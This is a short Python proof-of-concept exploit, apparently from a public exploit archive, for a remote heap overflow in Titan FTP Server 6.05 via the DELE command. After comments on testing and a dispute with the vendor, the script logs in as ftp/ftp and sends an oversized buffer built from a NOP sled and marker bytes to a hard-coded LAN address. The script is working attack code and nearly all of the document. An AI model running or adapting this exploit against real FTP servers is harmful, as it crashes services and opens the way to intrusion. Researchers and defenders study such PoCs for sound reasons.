titan-heap-py.txt

`#!/usr/bin/python  
#  
# First of all, thanks to my wife Edita.  
#  
# Remote Heap overflow in Titan FTP Server version 6.05 build 550  
# (DELE ) - probably other commands are vulnerable too  
# PoC tested on WinXP sp1  
# EAX and ESI are overwritten with 41414141 and 44444444  
#  
# Greetz to muts, m1k1, bolexxx  
# and crew from offsec, remote-exploit.org, Cedes.ba, Itas and Cikom :)  
#  
# "Actually, we always release patches to customers first, then to the  
general public a few days later.  
# So both the User/Pass issue and your issue are basically invalid as they  
were already fixed by the time you ran  
# your tests."  
# This was the last answer from vendor when i contacted them. They asked me  
which version i used, i said "the last one,  
# 6.05 build 550". They said there is patched/fixed release 6.10, then i  
asked where? Then, they sent me the mail you  
# see above.  
#  
# Coded by Muris Kurgas a.k.a j0rgan < muris [at] cg [dot] yu >  
  
  
import socket  
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
print "\nSaljem zli bafer..."  
buffer = '\x90' * 20519 + "A" * 4 + "D" * 4 + "B" * 55000  
s.connect(('192.168.1.9',21))  
data = s.recv(1024)  
s.send('USER ftp' +'\r\n')  
data = s.recv(1024)  
s.send('PASS ftp' +'\r\n')  
data = s.recv(1024)  
print "\nBum! Bum! Bum! :)"  
s.send('DELE ' +buffer+'\r\n')  
s.close()  
  
  
be safe,  
j0rgan  
`